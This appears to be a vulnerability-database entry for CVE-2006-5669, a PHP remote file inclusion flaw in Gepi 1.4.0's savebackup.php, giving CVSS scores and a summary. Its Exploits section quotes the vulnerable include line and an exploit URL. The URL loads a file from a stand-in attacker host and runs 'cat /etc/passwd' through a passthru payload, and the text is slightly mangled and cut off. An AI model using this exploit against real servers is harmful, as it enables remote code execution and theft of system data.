7.5
CVSSv2

CVE-2006-5669

Published: 03/11/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in gestion/savebackup.php in Gepi 1.4.0 and previous versions, and possibly other versions prior to 1.4.4, allows remote malicious users to execute arbitrary PHP code via a URL in the filename parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

gepi gepi 1.4.0

Exploits

Package:- gepi 140 adullactnet/frs/downloadphp/992/gepi-140targz impact:- highly critical System Access vulnerable code:- include($_GET['filename']); in gepi/gestion/savebackupphp Exploit:- localhost/gepi/gestion/savebackupphp?filename=attackercom/testtxt&cmd=cat /etc/passwd in testtxt <? passth ...